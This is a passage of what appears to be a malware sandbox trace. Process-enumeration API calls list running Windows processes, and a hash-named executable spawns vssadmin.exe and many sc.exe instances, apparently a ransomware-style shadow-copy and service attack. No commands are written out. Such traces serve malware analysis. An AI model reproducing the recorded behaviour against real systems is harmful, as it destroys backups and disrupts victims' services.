hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x264, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.286] wcslen (_String="svchost.exe") returned 0xb [0065.286] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x2a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0065.287] wcslen (_String="spoolsv.exe") returned 0xb [0065.287] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.287] wcslen (_String="svchost.exe") returned 0xb [0065.287] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.288] wcslen (_String="svchost.exe") returned 0xb [0065.288] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0065.289] wcslen (_String="OfficeClickToRun.exe") returned 0x14 [0065.289] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.290] wcslen (_String="svchost.exe") returned 0xb [0065.290] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0065.291] wcslen (_String="sihost.exe") returned 0xa [0065.291] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0065.291] wcslen (_String="taskhostw.exe") returned 0xd [0065.291] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x42, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0065.292] wcslen (_String="explorer.exe") returned 0xc [0065.292] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0065.293] wcslen (_String="RuntimeBroker.exe") returned 0x11 [0065.293] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0065.294] wcslen (_String="ShellExperienceHost.exe") returned 0x17 [0065.294] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0065.295] wcslen (_String="SearchUI.exe") returned 0xc [0065.295] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="beds rice.exe")) returned 1 [0065.296] wcslen (_String="beds rice.exe") returned 0xd [0065.296] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="crashuwimperialoils.exe")) returned 1 [0065.297] wcslen (_String="crashuwimperialoils.exe") returned 0x17 [0065.297] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="exceptions_refers.exe")) returned 1 [0065.298] wcslen (_String="exceptions_refers.exe") returned 0x15 [0065.298] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="pantyhose-timber-sponsored.exe")) returned 1 [0065.298] wcslen (_String="pantyhose-timber-sponsored.exe") returned 0x1e [0065.298] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="invision-tissue-universe-alliance.exe")) returned 1 [0065.299] wcslen (_String="invision-tissue-universe-alliance.exe") returned 0x25 [0065.299] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="peoplesdrawedited.exe")) returned 1 [0065.300] wcslen (_String="peoplesdrawedited.exe") returned 0x15 [0065.300] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="veterinaryexistence.exe")) returned 1 [0065.301] wcslen (_String="veterinaryexistence.exe") returned 0x17 [0065.301] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="verifytorture.exe")) returned 1 [0065.302] wcslen (_String="verifytorture.exe") returned 0x11 [0065.302] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="declaration.exe")) returned 1 [0065.302] wcslen (_String="declaration.exe") returned 0xf [0065.303] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="gossip_vocal_outlet.exe")) returned 1 [0065.303] wcslen (_String="gossip_vocal_outlet.exe") returned 0x17 [0065.303] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="hrs housewives orange advantages.exe")) returned 1 [0065.304] wcslen (_String="hrs housewives orange advantages.exe") returned 0x24 [0065.304] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="hour sponsored.exe")) returned 1 [0065.305] wcslen (_String="hour sponsored.exe") returned 0x12 [0065.305] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="dk chester theft ye.exe")) returned 1 [0065.306] wcslen (_String="dk chester theft ye.exe") returned 0x17 [0065.306] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="manufactured_engaged_shift_have.exe")) returned 1 [0065.307] wcslen (_String="manufactured_engaged_shift_have.exe") returned 0x23 [0065.307] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="band.exe")) returned 1 [0065.308] wcslen (_String="band.exe") returned 0x8 [0065.308] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="economies.exe")) returned 1 [0065.309] wcslen (_String="economies.exe") returned 0xd [0065.309] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="minimal-extreme.exe")) returned 1 [0065.309] wcslen (_String="minimal-extreme.exe") returned 0x13 [0065.309] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="neuralexpandcancellationeuro.exe")) returned 1 [0065.310] wcslen (_String="neuralexpandcancellationeuro.exe") returned 0x20 [0065.310] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0065.311] wcslen (_String="backgroundTaskHost.exe") returned 0x16 [0065.311] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0065.312] wcslen (_String="audiodg.exe") returned 0xb [0065.312] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe")) returned 1 [0065.313] wcslen (_String="f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe") returned 0x44 [0065.313] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0065.314] wcslen (_String="vssadmin.exe") returned 0xc [0065.314] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xb68, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.315] wcslen (_String="conhost.exe") returned 0xb [0065.315] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.315] wcslen (_String="sc.exe") returned 0x6 [0065.315] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.316] wcslen (_String="sc.exe") returned 0x6 [0065.316] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.317] wcslen (_String="sc.exe") returned 0x6 [0065.317] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.318] wcslen (_String="sc.exe") returned 0x6 [0065.318] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.319] wcslen (_String="sc.exe") returned 0x6 [0065.319] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.319] wcslen (_String="sc.exe") returned 0x6 [0065.320] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.436] wcslen (_String="sc.exe") returned 0x6 [0065.436] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x758, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.437] wcslen (_String="sc.exe") returned 0x6 [0065.437] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.438] wcslen (_String="sc.exe") returned 0x6 [0065.438] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.439] wcslen (_String="sc.exe") returned 0x6 [0065.439] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.440] wcslen (_String="sc.exe") returned 0x6 [0065.440] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.440] wcslen (_String="sc.exe") returned 0x6 [0065.440] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.441] wcslen (_String="sc.exe") returned 0x6 [0065.441] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.442] wcslen (_String="sc.exe") returned 0x6 [0065.442] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.443] wcslen (_String="sc.exe") returned 0x6 [0065.443] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.444] wcslen (_String="sc.exe") returned 0x6 [0065.444] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.445] wcslen (_String="sc.exe") returned 0x6 [0065.445] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xafc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.445] wcslen (_String="conhost.exe") returned 0xb [0065.445] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x8d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.446] wcslen (_String="conhost.exe") returned 0xb [0065.446] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.447] wcslen (_String="conhost.exe") returned 0xb [0065.447] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xb0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.448] wcslen (_String="conhost.exe") returned 0xb [0065.448] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xb34, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.449] wcslen (_String="conhost.exe") returned 0xb [0065.449] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xb64, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.450] wcslen (_String="conhost.exe") returned 0xb [0065.450] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbd4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.450] wcslen (_String="conhost.exe") returned 0xb [0065.450] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x758, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.451] wcslen (_String="conhost.exe") returned 0xb [0065.452] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa34, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.452] wcslen (_String="conhost.exe") returned 0xb [0065.452] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x82c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.453] wcslen (_String="conhost.exe") returned 0xb [0065.453] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.454] wcslen (_String="conhost.exe") returned 0xb [0065.454] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xaf8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.455] wcslen (_String="conhost.exe") returned 0xb [0065.455] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x38c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.456] wcslen (_String="conhost.exe") returned 0xb [0065.456] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.456] wcslen (_String="conhost.exe") returned 0xb [0065.456] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.457] wcslen (_String="conhost.exe") returned 0xb [0065.457] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbc4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.458] wcslen (_String="conhost.exe") returned 0xb [0065.458] Process32NextW (in: hSnapshot=0x17c, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xcfc, 